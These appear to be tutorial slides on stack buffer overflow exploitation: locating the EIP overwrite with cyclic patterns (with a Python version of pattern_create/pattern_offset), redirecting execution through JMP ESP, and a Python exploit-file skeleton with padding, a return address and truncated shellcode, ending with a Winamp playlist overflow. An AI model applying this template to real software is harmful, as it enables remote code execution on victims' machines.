6. Step 2: Verify the bug
Where is the EIP?
Use a debugger to guide yourself.
Use different inputs to limit the range
of your expectations.
Use unique patterns to find exactly
where in the file the EIP overwrite lands:
./pattern_create.rb <size>
./pattern_offset.rb <data written in EIP> <size>
You've got the EIP... Sweet!
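As an added example (not from the slides or from the Metasploit tools themselves), here is a Python reimplementation of the cyclic-pattern trick behind pattern_create.rb and pattern_offset.rb: pattern_create builds the "Aa0Aa1..." pattern, and pattern_offset maps the dword the debugger shows in EIP after the crash (the four ASCII characters, or the little-endian hex value) back to its position in the input. That mapping is the triage step that tells you whether a crash really controls the instruction pointer. The function names and the `MAX_PATTERN` constant are my own.

```python
import string
import struct

# Metasploit-style cyclic pattern "Aa0Aa1Aa2...Aa9Ab0...Zz9": every 4-byte
# window is unique, so the pattern only stays unambiguous up to this length.
MAX_PATTERN = 26 * 26 * 10 * 3   # 20280 bytes


def pattern_create(size):
    """Return the first `size` characters of the cyclic pattern."""
    if size > MAX_PATTERN:
        raise ValueError("pattern would repeat beyond %d bytes" % MAX_PATTERN)
    chunks = []
    total = 0
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                total += 3
                if total >= size:
                    return "".join(chunks)[:size]
    return "".join(chunks)[:size]   # not reached for 0 <= size <= MAX_PATTERN


def pattern_offset(crash_value, size=MAX_PATTERN):
    """Offset of `crash_value` inside the pattern, or None if it is not there.

    crash_value may be the 4 ASCII characters themselves ("0Aa1") or the
    dword seen in EIP as an int / "0x..." string.  A dword is unpacked
    little-endian, which is how the overwritten return address sits on an
    x86 stack.  A value seen in EIP that is not from the pattern (e.g. the
    original return address) yields None: the crash may not control EIP.
    """
    if isinstance(crash_value, str) and crash_value.lower().startswith("0x"):
        crash_value = int(crash_value, 16)
    if isinstance(crash_value, int):
        needle = struct.pack("<I", crash_value).decode("ascii", "replace")
    else:
        needle = crash_value
    pattern = pattern_create(size)
    offset = pattern.find(needle)
    if offset < 0:
        return None
    if pattern.find(needle, offset + 1) >= 0:
        # Fewer than 4 bytes were given and they occur more than once.
        raise ValueError("ambiguous value %r: pass the full 4 bytes" % needle)
    return offset
```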
7. Now what?
Now that you have the EIP you should
be able to overwrite it with an
address where you have your evil (no?) code.
We call this the shellcode.
A shellcode is a small piece of code
used as the payload in the
exploitation of a software
vulnerability.
Ok... WHERE!
8. Where?
Remember when you overwrote your
EIP? Why not use the rest of the
buffer to put it there, right
where the ESP is pointing?
EIP ==> ESP "DMA nope!"
Use a jump op (JMP ESP) from one of the
DLLs...
Google some resources for that ;)
12. Finalize:
#!/usr/bin/env python
some_file = "input.bin"   # placeholder: whatever file the target program reads
buff = b'A' * 26072                 # padding up to the saved return address
buff += b'\x3a\xf2\xa8\x01'         # EIP overwrite: JMP ESP address
buff += b'CCCC'                     # 4 bytes of garbage
buff += (b"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
         b"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
         b"\x31\xc0\xac\x3c.....")   # your shellcode (truncated on the slide)
f = open(some_file, 'wb')   # bytes, not text: however this file is fed to the program
f.write(buff)
f.close()
13. Now add it to your code
and you're done.
Winamp remote buffer overflow exploit
live demo.
[This flaw is triggered when an audio file path is
specified, inside a playlist, that consists of a UNC
path with a long computer name. This module delivers the
playlist via the browser.]